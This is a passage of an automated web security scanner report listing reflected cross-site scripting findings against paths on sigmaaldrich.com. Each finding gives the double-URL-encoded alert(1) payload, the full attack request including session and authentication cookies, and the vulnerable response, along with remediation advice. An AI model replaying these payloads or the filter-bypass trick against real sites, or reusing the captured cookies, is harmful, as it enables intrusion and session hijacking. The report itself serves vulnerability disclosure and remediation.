Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:42 GMT
Content-Length: 28974
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news5afdd";alert(1)//7f530c62bdf","E404") ;
   </script>
...[SNIP]...

1.456. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/online-catalog/chromatogram-icon [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/online-catalog/chromatogram-icon

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61734%2522%253balert%25281%2529%252f%252f07b5490f80a was submitted in the REST URL parameter 1. This input was echoed as 61734";alert(1)//07b5490f80a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc61734%2522%253balert%25281%2529%252f%252f07b5490f80a/medialib/sigma-aldrich/images/online-catalog/chromatogram-icon HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:32 GMT
Content-Length: 28970
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc61734";alert(1)//07b5490f80a/medialib/sigma-aldrich/images/online-catalog/chromatogram-icon","E404") ;
   </script>
...[SNIP]...

1.457. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/online-catalog/chromatogram-icon [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/online-catalog/chromatogram-icon

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1431c%2522%253balert%25281%2529%252f%252f3a483d708bd was submitted in the REST URL parameter 2. This input was echoed as 1431c";alert(1)//3a483d708bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib1431c%2522%253balert%25281%2529%252f%252f3a483d708bd/sigma-aldrich/images/online-catalog/chromatogram-icon HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:34 GMT
Content-Length: 28970
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib1431c";alert(1)//3a483d708bd/sigma-aldrich/images/online-catalog/chromatogram-icon","E404") ;
   </script>
...[SNIP]...

1.458. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/online-catalog/chromatogram-icon [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/online-catalog/chromatogram-icon

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2d9c%2522%253balert%25281%2529%252f%252f71ef9625030 was submitted in the REST URL parameter 3. This input was echoed as d2d9c";alert(1)//71ef9625030 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrichd2d9c%2522%253balert%25281%2529%252f%252f71ef9625030/images/online-catalog/chromatogram-icon HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:37 GMT
Content-Length: 28970
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrichd2d9c";alert(1)//71ef9625030/images/online-catalog/chromatogram-icon","E404") ;
   </script>
...[SNIP]...

1.459. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/online-catalog/chromatogram-icon [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/online-catalog/chromatogram-icon

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d789%2522%253balert%25281%2529%252f%252f10c02fb1132 was submitted in the REST URL parameter 4. This input was echoed as 3d789";alert(1)//10c02fb1132 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/images3d789%2522%253balert%25281%2529%252f%252f10c02fb1132/online-catalog/chromatogram-icon HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:40 GMT
Content-Length: 28970
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/images3d789";alert(1)//10c02fb1132/online-catalog/chromatogram-icon","E404") ;
   </script>
...[SNIP]...

1.460. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/online-catalog/chromatogram-icon [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/online-catalog/chromatogram-icon

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea66d%2522%253balert%25281%2529%252f%252f0e85a483f8f was submitted in the REST URL parameter 5. This input was echoed as ea66d";alert(1)//0e85a483f8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/images/online-catalogea66d%2522%253balert%25281%2529%252f%252f0e85a483f8f/chromatogram-icon HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
